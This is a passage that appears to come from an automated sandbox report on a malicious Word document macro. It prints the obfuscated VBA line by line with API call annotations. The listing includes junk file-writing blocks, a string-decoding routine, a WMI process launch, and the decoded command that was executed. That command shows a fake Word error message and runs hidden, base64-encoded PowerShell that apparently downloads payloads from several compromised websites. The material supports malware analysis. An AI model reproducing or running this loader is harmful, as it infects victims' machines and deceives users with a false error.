                                                    61

                                                    gEcrV.WriteLine "dXFPCSYtSNB"

                                                    WriteLine

                                                    62

                                                    gEcrV.WriteLine "KqVyuQQfwTWh"

                                                    WriteLine

                                                    63

                                                    gEcrV.WriteLine "qDaYIDDSZQMTaO"

                                                    WriteLine

                                                    64

                                                    Set IePCGy = GznGGHyG

                                                    GznGGHyG

                                                    65

                                                    gEcrV.Close

                                                    Close

                                                    66

                                                    Set RqlOZAHRJ = Nothing

                                                    67

                                                    Set cwsTFPCH = bbsIZ

                                                    bbsIZ

                                                    68

                                                    Set gEcrV = Nothing

                                                    68

                                                    gEcrV:

                                                    70

                                                    Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                                    Mid

                                                    Name

                                                    Application

                                                    71

                                                    Goto ZMdrVHGz

                                                    72

                                                    Dim xsruLB as Object

                                                    73

                                                    Set fiyQuiRBI = swNGWdd

                                                    swNGWdd

                                                    74

                                                    Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    75

                                                    Dim ZMdrVHGz as Object

                                                    76

                                                    Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")

                                                    CreateTextFile

                                                    77

                                                    ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"

                                                    WriteLine

                                                    78

                                                    ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"

                                                    WriteLine

                                                    79

                                                    ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"

                                                    WriteLine

                                                    80

                                                    Set xPBGH = rJEkbLH

                                                    rJEkbLH

                                                    81

                                                    ZMdrVHGz.Close

                                                    Close

                                                    82

                                                    Set xsruLB = Nothing

                                                    83

                                                    Set dLRiF = vEBqHrDnD

                                                    vEBqHrDnD

                                                    84

                                                    Set ZMdrVHGz = Nothing

                                                    84

                                                    ZMdrVHGz:

                                                    86

                                                    K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s

                                                    87

                                                    Goto fDZVKAAc

                                                    88

                                                    Dim tzErBRFe as Object

                                                    89

                                                    Set SeHafBC = tWcKo

                                                    tWcKo

                                                    90

                                                    Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    91

                                                    Dim fDZVKAAc as Object

                                                    92

                                                    Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")

                                                    CreateTextFile

                                                    93

                                                    fDZVKAAc.WriteLine "hKlajOujwgDFAA"

                                                    WriteLine

                                                    94

                                                    fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"

                                                    WriteLine

                                                    95

                                                    fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"

                                                    WriteLine

                                                    96

                                                    Set CHVmaVC = LzxxRHG

                                                    LzxxRHG

                                                    97

                                                    fDZVKAAc.Close

                                                    Close

                                                    98

                                                    Set tzErBRFe = Nothing

                                                    99

                                                    Set WlBWDXGD = EKezHIC

                                                    EKezHIC

                                                    100

                                                    Set fDZVKAAc = Nothing

                                                    100

                                                    fDZVKAAc:

                                                    102

                                                    Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)

                                                    103

                                                    Goto rYbgBh

                                                    104

                                                    Dim hZCth as Object

                                                    105

                                                    Set LQqlBAHD = DpYbmDA

                                                    DpYbmDA

                                                    106

                                                    Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    107

                                                    Dim rYbgBh as Object

                                                    108

                                                    Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")

                                                    CreateTextFile

                                                    109

                                                    rYbgBh.WriteLine "CVbRCAAhkhmcDG"

                                                    WriteLine

                                                    110

                                                    rYbgBh.WriteLine "XrrAwQZPjqB"

                                                    WriteLine

                                                    111

                                                    rYbgBh.WriteLine "fxSJajCGlWUEBW"

                                                    WriteLine

                                                    112

                                                    Set phIwFD = hDJDJ

                                                    hDJDJ

                                                    113

                                                    rYbgBh.Close

                                                    Close

                                                    114

                                                    Set hZCth = Nothing

                                                    115

                                                    Set PnolTIbAB = dXiwA

                                                    dXiwA

                                                    116

                                                    Set rYbgBh = Nothing

                                                    116

                                                    rYbgBh:

                                                    118

                                                    Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)

                                                    CreateObject("winmgmts:win32_process")

                                                    executed
                                                    119

                                                    Goto GfRPP

                                                    120

                                                    Dim xLQtMd as Object

                                                    121

                                                    Set uRnkDGJ = hFSyAfFrF

                                                    hFSyAfFrF

                                                    122

                                                    Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    123

                                                    Dim GfRPP as Object

                                                    124

                                                    Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")

                                                    CreateTextFile

                                                    125

                                                    GfRPP.WriteLine "qiXBsMBsLJGbX"

                                                    WriteLine

                                                    126

                                                    GfRPP.WriteLine "mehEFPFHcklgJDDx"

                                                    WriteLine

                                                    127

                                                    GfRPP.WriteLine "BndJDkuVYF"

                                                    WriteLine

                                                    128

                                                    Set xiFRA = hXxQDACJA

                                                    hXxQDACJA

                                                    129

                                                    GfRPP.Close

                                                    Close

                                                    130

                                                    Set xLQtMd = Nothing

                                                    131

                                                    Set jENfzNH = xkQqDXCcD

                                                    xkQqDXCcD

                                                    132

                                                    Set GfRPP = Nothing

                                                    132

                                                    GfRPP:

                                                    134

                                                    Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))

                                                    Mid

                                                    Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689

                                                    executed
                                                    135

                                                    Goto sCOIGDtD

                                                    136

                                                    Dim eepvDEaE as Object

                                                    137

                                                    Set jzqBlGW = lBenBDA

                                                    lBenBDA

                                                    138

                                                    Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    139

                                                    Dim sCOIGDtD as Object

                                                    140

                                                    Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")

                                                    CreateTextFile

                                                    141

                                                    sCOIGDtD.WriteLine "JTSPCDjykfL"

                                                    WriteLine

                                                    142

                                                    sCOIGDtD.WriteLine "bBmgOCvPPojGGC"

                                                    WriteLine

                                                    143

                                                    sCOIGDtD.WriteLine "anBQXljzGenE"

                                                    WriteLine

                                                    144

                                                    Set tAmQHxlD = UavHTIBHo

                                                    UavHTIBHo

                                                    145

                                                    sCOIGDtD.Close

                                                    Close

                                                    146

                                                    Set eepvDEaE = Nothing

                                                    147

                                                    Set gphNDVZp = IcAHwPH

                                                    IcAHwPH

                                                    148

                                                    Set sCOIGDtD = Nothing

                                                    148

                                                    sCOIGDtD:

                                                    150

                                                    Goto fmwdEMADQ

                                                    151

                                                    Dim DkLoDL as Object

                                                    152

                                                    Set plqkuDI = BNmrm

                                                    BNmrm

                                                    153

                                                    Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    154

                                                    Dim fmwdEMADQ as Object

                                                    155

                                                    Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")

                                                    CreateTextFile

                                                    156

                                                    fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"

                                                    WriteLine

                                                    157

                                                    fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"

                                                    WriteLine

                                                    158

                                                    fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"

                                                    WriteLine

                                                    159

                                                    Set jPJENIo = FLtYjKHC

                                                    FLtYjKHC

                                                    160

                                                    fmwdEMADQ.Close

                                                    Close

                                                    161

                                                    Set DkLoDL = Nothing

                                                    162

                                                    Set ANzGyzCD = qAUhkIMz

                                                    qAUhkIMz

                                                    163

                                                    Set fmwdEMADQ = Nothing

                                                    163

                                                    fmwdEMADQ:

                                                    165

                                                    Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y

                                                    SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0

                                                    V2enhc4htwl7z6bh

                                                    Thriap3q9rgf3yy9y

                                                    executed
                                                    166

                                                    Goto pkixJADG

                                                    167

                                                    Dim DhnHIY as Object

                                                    168

                                                    Set oQgLUI = zZuzBZGD

                                                    zZuzBZGD

                                                    169

                                                    Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    170

                                                    Dim pkixJADG as Object

                                                    171

                                                    Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")

                                                    CreateTextFile

                                                    172

                                                    pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"

                                                    WriteLine

                                                    173

                                                    pkixJADG.WriteLine "wypNISsWSXthFJCq"

                                                    WriteLine

                                                    174

                                                    pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"

                                                    WriteLine

                                                    175

                                                    Set ecGmY = OIbfvEEFF

                                                    OIbfvEEFF

                                                    176

                                                    pkixJADG.Close

                                                    Close

                                                    177

                                                    Set DhnHIY = Nothing

                                                    178

                                                    Set EKmLA = eLmLDU

                                                    eLmLDU

                                                    179

                                                    Set pkixJADG = Nothing

                                                    179

                                                    pkixJADG:

                                                    181

                                                    Goto KmGOADt

                                                    182

                                                    Dim CFdSBD as Object

                                                    183

                                                    Set nhLeJMLfI = FYVZFEH

                                                    FYVZFEH

                                                    184

                                                    Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    185

                                                    Dim KmGOADt as Object

                                                    186

                                                    Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")

                                                    CreateTextFile

                                                    187

                                                    KmGOADt.WriteLine "DBvMcNtCcMyJDDI"

                                                    WriteLine

                                                    188

                                                    KmGOADt.WriteLine "eXpjHFapHaPdRJu"

                                                    WriteLine

                                                    189

                                                    KmGOADt.WriteLine "eXObOTlBAITEOIo"

                                                    WriteLine

                                                    190

                                                    Set STzBjwICv = hoyzuBGCP

                                                    hoyzuBGCP

                                                    191

                                                    KmGOADt.Close

                                                    Close

                                                    192

                                                    Set CFdSBD = Nothing

                                                    193

                                                    Set ORLICIl = lADFBaJ

                                                    lADFBaJ

                                                    194

                                                    Set KmGOADt = Nothing

                                                    194

                                                    KmGOADt:

                                                    196

                                                    End Function

                                                    Function Jlda77h_v8nx5, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566
                                                    APIsMeta Information

                                                    SQQWY

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    ddanFDWJf

                                                    Close

                                                    RhztCF

                                                    kwzjKvZHe

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

